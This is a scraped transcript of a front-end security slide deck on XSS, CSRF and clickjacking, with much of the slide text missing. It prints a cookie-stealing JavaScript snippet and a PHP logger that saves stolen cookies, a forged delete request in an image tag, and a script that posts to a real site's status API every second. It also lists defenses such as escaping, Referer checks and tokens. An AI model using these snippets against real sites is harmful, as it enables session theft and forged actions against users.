F2e security
F2e security Presentation Transcript

  • Cross-site scripting XSS
  • XSS
    • Cookie
    • DOM
    • …
  • Yupoo XSS
  • alert
  • JavaScript:
    var img = new Image();
    img.src = "get_cookie.php?var=" + encodeURI(document.cookie);
    PHP:
    <?php
    if (isset($_GET['var'])) {
        file_put_contents('./cookie/' . time() . '.txt', urldecode($_GET['var']));
    }
  • “ ”
  • • Filter input,Escape output• Cookie• noscript?
  • ••
  • • http://en.wikipedia.org/wiki/Cross-site_scripting• http://www.gracecode.com/archives/2517• http://www.gracecode.com/archives/2491• http://ha.ckers.org/xss.html• http://www.xssed.com/
  • CSRF Cross Site Request Forgery
  • <img src="http://.../del.php?id=64" />
  • <form action="http://jiwai.de/wo/status/update" method="post">
      <textarea name="jw_status"></textarea>
      <input type="submit" />
    </form>
  • GET / POST
  • setInterval(function() {
      var img = new Image();
      var message = ''; // message text stripped from the transcript
      var api = 'http://jiwai.de/wo/status/update';
      img.src = api + '?jw_status=' + message + '&t=' + +new Date();
    }, 1000);
  • GET / POST, Cookie
    • Referer
    • Token
  • _tb_token_
    • Referer
  • References
    • http://en.wikipedia.org/wiki/Cross-site_request_forgery
    • http://www.cgisecurity.com/csrf-faq.html
    • http://www.80sec.com/csrf-securit.html
    • http://www.playhack.net/view.php?id=31
  • Twitter Clickjacking
  • 1. iframe Twitter 0
    2. “ ”
    3. Twitter
  • CSRF
  • Cookie Session
  • JS
  • Q&A
  • alert(/tHx/).replace(/.+/, eval);